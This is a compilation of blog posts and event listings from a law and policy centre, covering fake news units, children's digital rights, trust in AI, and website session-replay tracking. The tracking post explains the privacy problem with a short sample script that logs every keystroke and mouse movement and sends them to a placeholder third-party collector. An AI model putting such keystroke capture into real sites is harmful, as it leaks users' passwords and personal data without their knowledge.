Video: Children and Digital Rights: Regulating Freedoms and Safeguards (YouTube)

Baroness Beeban Kidron OBE, Film-maker, Member of The Royal Foundation Taskforce on the Prevention of Cyberbullying, and Founder of 5Rights

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

Parliament’s Digital, Culture, Media and Sport Committee is currently investigating the use of fake news – the spreading of stories of “uncertain provenance or accuracy” – through social media and other channels. The investigation is taking place amid claims that Russia used hundreds of fake accounts to tweet about Brexit. The head of the army, General Sir Nick Carter, recently told the think-tank RUSI that Britain should be prepared to fight an increasingly assertive Russia.

Details of the new anti-fake news unit are vague, but may mark a return to Britain’s Cold War past and the work of the Foreign Office’s Information Research Department (IRD), which was set up in 1948 to counter Soviet propaganda. The unit was the brainchild of Christopher Mayhew, Labour MP and under-secretary in the Foreign Office, and grew to become one of the largest Foreign Office departments before its disbandment in 1977 – a story revealed in The Guardian in January 1978 by its investigative reporter David Leigh.

This secretive government body worked with politicians, journalists and foreign governments to counter Soviet lies, through unattributable “grey” propaganda and confidential briefings on “Communist themes”. IRD eventually expanded from this narrow anti-Soviet remit to protect British interests where they were likely “to be the object of hostile threats”.



Read more: Good luck banning fake news – here’s why it’s unlikely to happen

By 1949, IRD had a staff of just 52, all based in central London. By 1965 it employed 390 staff, including 48 overseas, with a budget of over £1m mostly paid from the “secret vote” used to fund the UK intelligence community. IRD also worked alongside the Secret Intelligence Service (SIS or MI6) and the BBC’s World Service.

Playing hardball with soft power

Examples of IRD’s early work include reports on Soviet gulags and the promotion of anti-communist literature. George Orwell’s work was actively promoted by the unit. Shortly before his death in 1950, Orwell even gave it a list of left-wing writers and journalists “who should not be trusted” to spread IRD’s message. During that decade, the department even moved into British domestic politics by setting up a “home desk” to counter communism in industry.

 

IRD also played an important role in undermining Indonesia’s President Sukarno in the 1960s, as well as supporting western NGOs – especially the Thomson and Ford Foundations. In 1996, former IRD official Norman Reddaway provided more information on IRD’s “long-term” campaigns (contained in private papers). These included “English by TV” broadcast to the Gulf, Sudan, Ethiopia and China, with other IRD-backed BBC initiatives – “Follow Me” and “Follow Me to Science” – which had an estimated audience of 100m in China.

IRD was even involved in supporting Britain’s entry to the European Economic Community, promoting the UK’s interests in Europe and backing politicians on both sides. It would shape the debate by writing a letter or article a day in the quality press. The department was also involved in more controversial campaigns, spreading anti-IRA propaganda during The Troubles in Northern Ireland, supporting Britain’s control of Gibraltar and countering the “Black Power” movement in the Caribbean.

[Image caption: Overthrown – President Sukarno of Indonesia.]

Going too far

IRD’s activities were steadily getting out of hand, yet an internal 1971 review found the department was still needed, given “the primary threat to British and Western interests worldwide remains that from Soviet Communism” and the “violent revolutionaries of the ‘New Left’”. IRD was a “flexible auxiliary, specialising in influencing opinion”, yet its days were numbered. By 1972 the organisation had just over 100 staff and faced significant budget cuts, despite attempts at reform.

IRD was eventually killed off thanks to opposition from Foreign Office mandarins and the then Labour foreign secretary, David Owen – though that may not be the end of the story. Officials soon set up the Overseas Information Department – likely a play on IRD’s name – tasked with producing “attributable and non-attributable” written guidance for journalists and politicians, though its overall role is unclear. Information work was also carried out by “alongsiders” such as the former IRD official Brian Crozier.

The history of IRD’s work is important to future debates on government strategy in countering “fake news”. The unit’s effectiveness is certainly open to debate. In many cases, IRD’s work reinforced the anti-Soviet views of some, while doing little, if anything, to influence general opinion.

In 1976, one Foreign Office official even admitted that IRD’s work could do “more harm than good to institutionalise our opposition” and was “very expensive in manpower and is practically impossible to evaluate in cost effectiveness” – a point worth considering today.

IRD’s rapid expansion from anti-communist unit to protecting Britain’s interests across the globe also shows that it’s hard to manage information campaigns. What may start out as a unit to counter “fake news” could easily spiral out of control, especially given the rapidly expanding online battlefield.

Government penny pinching on defence – a key issue in current debates – could also fail to match the resources at the disposal of the Russian state. In short, the lessons of IRD show that information work is not a quick fix. The British government could learn a lot by visiting the past.

This article was originally published on The Conversation. Read the original article.


The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, together with the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter and the Data Protection Bill, which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Video: Institute of Advanced Legal Studies, 20-11-17 (YouTube)

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Event date:
Monday, 20 November 2017 – 5:30pm

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants: Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision making. Technological advancements are now rendering emotions detectable in real time. Building on the granular insights provided by big data, these developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and other consumer-facing interactions, based on personal preferences, biases and emotional insights gleaned from the tracking of online activity, profiling, and the emergence of ‘empathic media’.

Although emotion measurement is far from a new phenomenon, technological developments are increasing the capacity to monetise emotions. Techniques ranging from the analysis of, inter alia, facial expressions and voice/sound patterns to text and data mining and the use of smart devices to detect emotions are becoming mainstream.

Many applications of such technologies appear morally above reproach, at least in terms of their goals (e.g. healthcare or road safety), as opposed to the risks associated with their implementation, deployment and potential effects. Their use for advertising and marketing purposes, however, raises clear concerns about the rationality-based paradigm inherent in citizen-consumer protections, and thus about the autonomous decision-making capacity of individuals.

In this ILPC seminar, Visiting Scholar Damian Clifford will examine the emergence of such technologies in an online context vis-à-vis their use for commercial advertising and marketing purposes (construed broadly) and the challenges they present for EU data protection and consumer protection law. The seminar will offer a descriptive and evaluative analysis of the relevant frameworks and aims to provide normative insights into the potential legal challenges presented by emotion commercialisation online.

Discussant: Dr Edina Harbinja is a Senior Lecturer in Law at the University of Hertfordshire. Her principal areas of research and teaching relate to the legal issues surrounding the Internet and emerging technologies. In her research, Edina explores the application of property, contract law, intellectual property and privacy online. Edina is a pioneer and a recognised expert in post-mortem privacy, i.e. the privacy of deceased individuals. Her research has a policy and multidisciplinary focus and aims to explore different options for regulating online behaviours and phenomena. She has been a visiting scholar and invited speaker at universities and conferences in the USA, Latin America and Europe, and has undertaken consultancy for the Fundamental Rights Agency. Her research has been cited by legislators, courts and policymakers in the US and Europe. Find her on Twitter at @EdinaRl.

A wine reception will follow this seminar.

This event is FREE but advance booking is required.


Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Description of Presentation:

Despite the World Economic Forum (2011) report on personal data becoming an asset class, the cost of transacting on personal data is becoming increasingly high, with regulatory risks, societal disapproval, legal complexity and privacy concerns. Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or, indeed, data in general. Hence, legal and economic structures have been created only around organisation-controlled personal data (OPD).

This presentation will argue that person-controlled personal data (PPD) – technologically, legally and economically architected so that the individual owns a personal micro-server and therefore has full rights to the data within, much like owning a PC or a smartphone – is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Key Speaker:

Professor Irene Ng, University of Warwick

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng advises large organisations, startups and governments on the design of markets and on economic and business models in the digital economy. Personal website: http://ireneng.com

Panel Discussants:

TBC

Chair:

Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, IALS

Wine reception to follow.


In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Should you trust Dr. Robot?

As a case in point, IBM’s attempt to promote its Watson for Oncology programme was a PR disaster. Using one of the world’s most powerful supercomputer systems to recommend the best cancer treatment to doctors seemed like an audacious undertaking straight out of sci-fi movies. The AI promised to deliver top-quality recommendations on the treatment of 12 cancers that accounted for 80% of the world’s cases. As of today, over 14,000 patients worldwide have received advice based on its calculations.

But when doctors first interacted with Watson they found themselves in a rather difficult situation. On the one hand, if Watson provided guidance about a treatment that coincided with their own opinions, physicians did not see much value in Watson’s recommendations.

The supercomputer was simply telling them what they already knew, and these recommendations did not change the actual treatment. This may have given doctors some peace of mind, providing them with more confidence in their own decisions. But IBM has yet to provide evidence that Watson actually improves cancer survival rates.

On the other hand, if Watson generated a recommendation that contradicted the experts’ opinion, doctors would typically conclude that Watson wasn’t competent enough (or blame the unorthodox solutions on system failures). What is more, the machine wouldn’t be able to explain why its treatment was plausible because its machine learning algorithms were simply too complex to be fully understood by humans. Consequently, this has caused even more mistrust and disbelief, leading many doctors to ignore the seemingly outlandish AI recommendations and stick to their own expertise in oncology.

As a result, IBM Watson’s premier medical partner, the MD Anderson Cancer Center, recently announced it was dropping the programme. Similarly, a Danish hospital reportedly abandoned the AI programme after discovering that its cancer doctors disagreed with Watson in over two thirds of cases.

The origins of trust issues: It’s a human thing

Many experts believe that our future society will be built on effective human-machine collaboration. But a lack of trust remains the single most important factor stopping this from happening.

The problem with Watson for Oncology was that doctors simply didn’t trust it. Human trust is often based on our understanding of how other people think and having experience of their reliability. This helps create a psychological feeling of safety. AI, on the other hand, is still fairly new and unfamiliar to most people. It makes decisions using a complex system of analysis to identify potentially hidden patterns and weak signals from large amounts of data.

Even if it can be technically explained (and that’s not always the case), AI’s decision-making process is usually too difficult for most people to understand. And interacting with something we don’t understand can cause anxiety and make us feel like we’re losing control. Many people are also simply not familiar with the many instances of AI actually working, because it often happens in the background. Instead, they are acutely aware of the instances where AI goes terribly wrong.

These unfortunate examples have received a disproportionate amount of media attention, emphasising the message that humans cannot always rely on technology. In the end, it all goes back to the simple truth that machine learning is not foolproof, in part because the humans who design it aren’t.

The effects of watching Terminator: A new AI divide in society?

Feelings about AI also run deep. But why do some people embrace AI, while others are deeply suspicious about it?

In December 2017, my colleagues and I ran an experiment in which we asked people from a range of backgrounds to watch various science-fiction films about AI and to fill out questionnaires about their attitudes to automation, both before and after watching the movie. We asked them about their general attitudes towards the Internet, their experiences with AI technology and their willingness to automate specific tasks in everyday life: which tasks were they happy to automate with a hypothetical AI assistant, and which tasks would they insist on carrying out themselves?

Surprisingly, it didn’t matter whether movies like Terminator, Her or Ex Machina depicted a utopian or dystopian future. We found that, regardless of whether the film they watched depicted AI in a positive or negative light, simply watching a cinematic vision of our technological future polarised the participants’ attitudes. Optimists became more extreme in their enthusiasm for AI, indicating that they were eager to automate more everyday tasks. Conversely, sceptics became even more guarded in their attitudes towards AI. They doubted the potential benefits of AI and were more willing to actively resist AI tools used by their friends and families.

The implications that stem from these findings are concerning. On the one hand, this suggests that people use relevant evidence about AI in a biased manner to support their existing attitudes, a deep-rooted human tendency known as confirmation bias. We believe that this cognitive bias is the main driving force behind the polarising effects we’ve observed in our study.

On the other hand, given the unrelenting pace of technological progress, refusing to partake in the advantages offered by AI could place a large group of people at a serious disadvantage. As AI is reported and represented more and more in popular culture and in the media, it could contribute to a deeply divided society, split between those who believe in (and consequently benefit from) AI and those who reject it.

More pertinently, these differences in AI trust could lead to differential access to job opportunities and, consequently, to differences in socio-economic status. The resulting clashes between AI followers and AI deniers could prompt governments to step in with heedless regulation that stifles innovation.

An exit out of the AI trust crisis

Distrust in AI could be the biggest dividing force in society. Therefore, if AI is to live up to its full potential, we have to find a way to get people to trust it, particularly if it produces recommendations that radically differ from what we are normally used to. Fortunately we already have some ideas about how to improve trust in AI — there’s light at the end of the tunnel.

  1. Experience: One solution may be to provide more hands-on experiences with automation apps and other AI applications in everyday situations (like this robot that can get you a beer from the fridge). Thus, instead of presenting Sony’s new robot dog Aibo as an exclusive product for the upper class, we’d recommend making these kinds of innovations more accessible to the masses. Simply having previous experience with AI can significantly improve people’s attitudes towards the technology, as we found in our experimental study. And this is especially important for the general public, which may not have a very sophisticated understanding of the technology. Similar evidence also suggests that the more you use other technologies, such as the Internet, the more you trust them.
  2. Insight: Another solution may be to open the “black-box” of machine learning algorithms and be slightly more transparent about how they work. Companies such as Google, Airbnb and Twitter already release transparency reports on a regular basis. These reports provide information about government requests and surveillance disclosures. A similar practice for AI systems could help people have a better understanding of how algorithmic decisions are made. Therefore, providing people with a top-level understanding of machine learning systems could go a long way towards alleviating algorithmic aversion.
  3. Control: Lastly, creating more of a collaborative decision-making process will help build trust and allow the AI to learn from human experience. In our work at Avantgarde Analytics, we have also found that involving people more in the AI decision-making process could improve trust and transparency. In a similar vein, a group of researchers at the University of Pennsylvania recently found that giving people control over algorithms can help create more trust in AI predictions. Volunteers in their study who were given the freedom to slightly modify an algorithm felt more satisfied with it, were more likely to believe it was superior and were more likely to use it in the future.

These guidelines (experience, insight and control) could help make AI systems more transparent and comprehensible to the individuals affected by their decisions. Our research suggests that people might trust AI more if they had more experience with it and control over how it is used, rather than simply being told to follow orders from a mysterious computer system.

People don’t need to understand the intricate inner workings of AI systems, but if they are given at least a bit of information about and control over how they are implemented, they will be more open to accepting AI into their lives.

About the author: Dr Vyacheslav Polonski is a researcher at the University of Oxford, studying complex social networks and collective behaviour. He holds a PhD in computational social science and has previously studied at Harvard, Oxford and LSE. He is the founder and CEO of Avantgarde Analytics, a machine learning startup that harnesses AI and behavioural psychology for the next generation of algorithmic campaigns. Vyacheslav is actively involved in the World Economic Forum Expert Network and the WEF Global Shapers community, where he served as the Curator of the Oxford Hub. He writes about the intersection of sociology, network science and technology.

Earlier versions of this article appeared in The Conversation and the Daily Mail on 09 January 2018.


In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Humphrey, I want to do something about predictions.

Indeed, Minister.

Yes Humphrey, the machines are taking over.

Are they Minister?

Yes Humphrey, my advisers tell me I should be up in arms.  Machines – ‘AI’ they call it – predicting what I’m going to buy, when I’m going to die, even if I’ll commit a crime.

Surely not, Minister.

Not me personally, of course, Humphrey – other people.  And then there’s this scandal over Cambridge Analytica and voter profiling.  Has no-one heard of the secret ballot?

Everyone knows which way you would vote, Minister.

Yes, yes, not me personally, of course, Humphrey – other people.  Anyway, I want to do something about it.

Of course, Minister.  Let me see – you want to ban voter and customer profiling, crime risk assessment and predictions of one’s demise, so that would mean no more targeted advertising, political campaigning, predictive policing, early parole releases, life insurance policies…

Well, let’s not be too hasty Humphrey.  I didn’t say anything about banning things.

My sincere apologies Minister, I had understood you wanted to do something.

Yes, Humphrey, about the machines, the AI.  People don’t like the idea of some faceless computer snooping into their lives and making predictions about them.

But it’s alright if a human does it.

Yes…well no…I don’t know.  What do you suggest Humphrey?

As I see it Minister, you have two problems.

Do I?

The people are the ones with the votes, the AI developers are the ones with the money and the important clients – insurance companies, social media giants, dare I say it, even political parties…

Yes, yes, I see.  I mustn’t alienate the money.  But I must be seen to be doing something Humphrey.

I have two suggestions Minister.  First, everything must be ‘transparent’.  Organisations using AI must say how their technology works and what data it uses.  Information, information everywhere…

I like it Humphrey.  Power to the people and all that.  And if they’ve had the information, they can’t complain, eh.  And the second thing?

A Commission, Minister, or a Committee, with eminent members, debating, assessing, scrutinising, evaluating, appraising…

And what is this Commission to do?

“Do” Minister?

What will the Commission do about predictions and AI?

It will scrutinise, Minister, it will evaluate, appraise and assess, and then, in two or three years, it will report.

But what will it say Humphrey?

I cannot possibly predict what the Commission on Predictions would say, being a mere humble servant of the Crown.

Humphrey!

But if I had to guess, I think it highly likely that it will say that context reigns supreme – there are good predictions and there are bad predictions, and there is good AI and there is bad AI.

So after three years of talking, all it will say is that ‘it depends’.

Yes Minister.

In homage to ‘Yes Minister’ by Antony Jay and Jonathan Lynn 

Marion Oswald, Senior Fellow in Law, Head of the Centre for Information Rights, University of Winchester

The Fifth Interdisciplinary Winchester Conference on Trust, Risk, Information and the Law will be held on Wednesday 25 April 2018 at the Holiday Inn, Winchester UK.  Our overall theme for this conference will be: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?  The call for papers and booking information can be found at https://journals.winchesteruniversitypress.org/index.php/jirpp/pages/view/TRIL


In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

The research found that third party tracking services are used by hundreds of businesses to monitor how users navigate their websites. This is proving to be increasingly challenging as more and more companies beef-up security and shift their sites over to encrypted HTTPS pages.

To work around this, session-replay scripts are deployed to monitor user interface behaviour on websites as a sequence of time-stamped events, such as keyboard and mouse movements. Each of these events records additional parameters – indicating the keystrokes (for keyboard events) and screen coordinates (for mouse movement events) – at the time of interaction. When associated with the content of a website and web address, this recorded sequence of events can be exactly replayed by another browser that triggers the functions defined by the website.
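To make the mechanism concrete, here is a minimal, hypothetical sketch of how such a recorder can capture time-stamped input events in the browser and ship them to a third party. The collector URL and event shape are invented for illustration; they are not taken from any of the commercial scripts examined in the study.

```typescript
// Minimal, hypothetical sketch of a session-replay recorder.
// The collector endpoint and event shape below are invented for
// illustration only; they are not taken from any real analytics vendor.

interface RecordedEvent {
  type: string;      // e.g. "keydown" or "mousemove"
  timestamp: number; // milliseconds since recording started
  key?: string;      // the keystroke, for keyboard events
  x?: number;        // screen coordinates, for mouse events
  y?: number;
}

const startTime = performance.now();
const buffer: RecordedEvent[] = [];

// Keystrokes are captured as they are typed -- before any form is submitted.
document.addEventListener("keydown", (e: KeyboardEvent) => {
  buffer.push({ type: "keydown", timestamp: performance.now() - startTime, key: e.key });
});

// Mouse movements are captured together with their screen coordinates.
document.addEventListener("mousemove", (e: MouseEvent) => {
  buffer.push({ type: "mousemove", timestamp: performance.now() - startTime, x: e.clientX, y: e.clientY });
});

// The buffered events are periodically shipped to a third-party server,
// where, combined with the page content and URL, they can be replayed.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon("https://collector.example.com/replay", JSON.stringify(buffer.splice(0)));
}, 5000);
```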

What this means is that a third party is able to see, for example, a user entering a password into an online form – which is a clear privacy breach. Websites employ third-party analytics firms to record and replay such behaviour, they argue, in the name of “enhancing user experience”. The more they know about what their users are after, the easier it is to provide them with targeted information.

While it’s not news that companies are monitoring our behaviour as we surf the web, the fact that scripts are quietly being deployed to record individual browser sessions in this way has concerned the study’s co-author, Steven Englehardt, who is a PhD candidate at Princeton.

Video: a website user replay demo in action (FullStory, YouTube).

“Collection of page content by third-party replay scripts may cause sensitive information, such as medical conditions, credit card details, and other personal information displayed on a page, to leak to the third-party as part of the recording,” he wrote. “This may expose users to identity theft, online scams and other unwanted behaviour. The same is true for the collection of user inputs during checkout and registration processes.”

Websites logging keystrokes has been a known issue among cybersecurity experts for a while. And Princeton’s empirical study raises valid concerns about users having little or no control over their surfing behaviour being recorded in this way.

So it’s important to help users control how their information is shared online. But there are increasing signs of usability trumping security measures that are designed to keep our data safe online.

Usability vs security

Password managers are used by millions of people to help them easily keep a record of different passwords for different sites. The user of such a service only needs to memorise one key password.

Recently, a group of researchers at the University of Derby and the Open University discovered that the offline clients of password manager services risked exposing the main key password when it was stored as plain text in memory, where it could be sniffed or dumped by whole-system attacks.
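A minimal sketch of the general mitigation, assuming a Node.js-style environment with the built-in crypto module: the master password is held in a mutable byte buffer and overwritten as soon as a vault key has been derived, rather than left in an immutable string that lingers in memory until garbage collection. This illustrates the principle only; it is not the fix adopted by any particular password manager.

```typescript
// Hypothetical illustration of limiting how long a master password
// stays in memory as plain text. Not the implementation of any real
// password manager.

import { scryptSync, randomBytes } from "crypto";

function deriveVaultKey(masterPassword: Uint8Array, salt: Uint8Array): Buffer {
  try {
    // Derive the key that actually unlocks the vault.
    return scryptSync(masterPassword, salt, 32);
  } finally {
    // Overwrite the plaintext password immediately; an immutable
    // string could not be scrubbed like this.
    masterPassword.fill(0);
  }
}

const salt = randomBytes(16);
const password = new TextEncoder().encode("correct horse battery staple"); // example value only
const key = deriveVaultKey(password, salt);
// `password` now contains only zeros; only the derived key remains in memory.
```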

User experience is not an excuse for tolerating security flaws.

This article was originally published on The Conversation. Read the original article.

